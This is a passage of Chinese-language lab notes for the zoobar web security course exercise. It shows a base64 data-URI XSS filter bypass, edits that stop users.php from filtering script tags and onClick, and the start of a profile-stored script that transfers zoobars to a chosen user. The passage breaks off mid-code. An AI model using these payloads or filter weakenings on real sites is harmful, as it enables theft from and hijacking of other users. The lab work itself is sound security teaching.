备注
# 可以把所有的vim替换成gedit可能使用更方便
# base64编码地址: https://www.base64encode.org/
XSS
前言
虽然对javascript:进行了一定的过滤可以使用base64编码进行绕过
比如<script>alert("1");</alert>
可以base64编码成PHNjcmlwdD5hbGVydCgiMSIpOzwvc2NyaXB0Pg==
然后可以组装成
<a href="data:text/html;base64, PHNjcmlwdD5hbGVydCgiMSIpOzwvc2NyaXB0Pg==">test</a>
放入profile, 可以实现攻击.
但是目前还没有发现攻击方法
正戏
1 不过滤指定内容
sudo vim /var/www/myzoo/users.php
# 修改如下内容
## 1. 不过滤<button><script>
$allowed_tags =
'<a><br><b><h1><h2><h3><h4><i><img><li><ol><p><strong><table>' .
'<tr><td><th><u><ul><em><span><button><script>';
## 2. 不过滤onClick事件
$disallowed下面删除其中的`|onClick`
2 偷取zoobar
代码解释
// 其中username是你希望发送给的用户
// 删除button可以查看此用户立即转给, 无需按键
// 为了阻止不利的跳转, 可以使用ajax
// 下文中的`username`需要根据自己的用户名就行修改
更新porfile为下述内容
<button onClick="my_fun()">发送1 zoobar给username</button>
<script>
function my_fun(){
xmlhttp=new XMLHttpReques